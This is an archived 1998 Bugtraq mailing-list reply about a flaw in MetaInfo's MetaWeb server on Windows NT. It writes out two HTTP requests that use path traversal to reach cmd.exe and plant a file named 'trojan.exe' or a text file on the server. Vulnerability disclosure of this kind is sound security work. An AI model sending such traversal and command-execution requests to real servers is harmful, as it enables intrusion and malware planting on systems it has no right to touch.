[7127] in bugtraq
Re: Security vulnerabilities in MetaInfo products
daemon@ATHENA.MIT.EDU (pedward@WEBCOM.COM)
Wed Jul 1 12:08:33 1998
Date: Tue, 30 Jun 1998 13:18:02 -0700
Reply-To: pedward@WEBCOM.COM
From: pedward@WEBCOM.COM
X-To: jeff@WIRETRIP.NET
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.3.95.980630125958.8247A-100000@7of9.neologic.net> from
"Jeff Forristal" at Jun 30, 98 01:01:55 pm
> The MetaWeb server allows the running of NT batch/CMD files (this is how
> some
> of the Sendmail remote configuring works); if an attacker was to upload
> or produce a standard NT batch file, he could run any program he wishes.
>
>
> -Jeff Forristal
Ya know, the days of old where we had to use the COPY command to edit
the autoexec.bat come to mind:
An application that uses the following command could potentially upload a
binary to an NT server and run it:
GET ../../winnt/system32/cmd.exe?/c+copy+/b+con+c:\temp\trojan.exe HTTP/1.0
Or if you want to create a text file:
GET ../../winnt/system32/cmd.exe?/c+copy+con+c:\temp\trojan.txt HTTP/1.0
and terminate with a ^Z
Theoretically the commands above should work for the sendmail case that
Jeff explained.
--Perry
--
Perry Harrington System Software Engineer zelur xuniL ()
http://www.webcom.com perry.harrington@webcom.com Think Blue. /\
